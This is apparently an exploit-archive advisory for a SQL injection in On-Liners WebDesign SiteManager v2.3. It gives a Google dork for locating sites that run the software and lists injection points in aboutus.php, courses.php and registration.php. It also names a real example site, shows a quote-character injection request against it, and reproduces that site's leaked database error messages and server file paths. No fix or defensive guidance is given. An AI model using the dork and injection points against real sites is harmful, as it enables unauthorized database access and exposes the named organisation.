On-Liners WebDesign SiteManager version 2.3 Onliners S.A.R.L suffers from a remote SQL injection vulnerability.
c1a1703a4f28180dc02c28ee396c1a50#################################################################################################
# Exploit Title : On-Liners WebDesign SiteManager V2.3 Onliners S.A.R.L SQL
Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : On-Liners.Com
# Category : WebApps
# Tested On : Windows and Linux
# Exploit Risk : Medium
# Web Server : Nginx 1.10.3
# JavaScript Frameworks : jQuery 2.2.4
# Operating System : Ubuntu OS
# Version Information : 2.3
# Google Dorks : intext:''Designed & Developed by Onliners dot com SARL''
+ ''intext:''SITEMANAGER V2.3 Onliners s.a.r.l.''
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050317
#################################################################################################
+ Arabia On-Liners.Com WebDesign SiteManager V2.3 Onliners S.A.R.L SQL
Injection Vulnerability
#################################################################################################
SQL Injection Exploits =>
/aboutus.php?id=[SQL Injection]
/courses.php?catId=[ID-Number]&subcatId=[SQL Injection]
/registration.php?id=[SQL Injection]
#################################################################################################
# Example Site => icmd.com.sa/courses.php?catId=11&subcatId=11%27 => [
Proof of Concept for SQL Inj ] => archive.is/JNyib
# SQL/DB Error :
Deprecated: mysql_connect(): The mysql extension is deprecated and will be
removed in the future: use mysqli or PDO instead in
/home/icmd911/public_html/connection_open.php on line 61
Warning: Cannot modify header information - headers already sent by (output
started at /home/icmd911/public_html
/connection_open.php:84) in /home/icmd911/public_html/courses.php on line 7
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
given in /home/icmd911/public_html/courses.php on line 13
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
given in /home/icmd911/public_html/courses.php on line 30
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################